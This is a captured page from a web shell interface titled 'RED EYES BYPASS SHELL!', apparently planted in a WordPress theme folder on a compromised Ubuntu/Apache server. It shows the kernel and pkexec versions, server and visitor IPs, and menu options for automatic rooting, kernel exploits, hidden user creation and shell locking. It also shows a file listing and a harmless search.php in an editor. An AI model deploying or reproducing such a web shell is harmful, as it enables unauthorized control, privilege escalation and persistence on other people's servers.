Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
sdgs /
wp-content /
themes /
envo-royal /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
assets
[ DIR ]
drwxr-xr-x
extra
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
404.php
1017
B
-rwxr-xr-x
archive.php
611
B
-rwxr-xr-x
comments.php
1.57
KB
-rwxr-xr-x
content-none.php
901
B
-rwxr-xr-x
content.php
500
B
-rwxr-xr-x
footer.php
184
B
-rwxr-xr-x
functions.php
13.89
KB
-rwxr-xr-x
header.php
471
B
-rwxr-xr-x
index.php
313
B
-rwxr-xr-x
page.php
707
B
-rwxr-xr-x
readme.txt
4.09
KB
-rwxr-xr-x
rtl.css
32.45
KB
-rwxr-xr-x
screenshot.png
183.68
KB
-rwxr-xr-x
search.php
715
B
-rwxr-xr-x
sidebar.php
188
B
-rwxr-xr-x
single-elementor_library.php
361
B
-rwxr-xr-x
single.php
918
B
-rwxr-xr-x
style.css
36.52
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : search.php
<?php get_header(); ?> <!-- start content container --> <div class="row"> <div class="col-md-<?php envo_royal_main_content_width_columns(); ?>"> <?php // if this was a search we display a page header with the results count. If there were no results we display the search form. if (is_search()) : /* translators: %s: search result string */ echo "<h1 class='search-head text-center'>" . sprintf(esc_html__('Search Results for: %s', 'envo-royal'), get_search_query()) . "</h1>"; endif; do_action('envo_royal_generate_the_content'); ?> </div> <?php get_sidebar('right'); ?> </div> <!-- end content container --> <?php get_footer();
Close